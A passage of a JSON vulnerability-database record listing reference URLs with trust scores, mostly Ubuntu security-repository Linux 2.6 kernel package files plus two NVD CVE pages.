        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
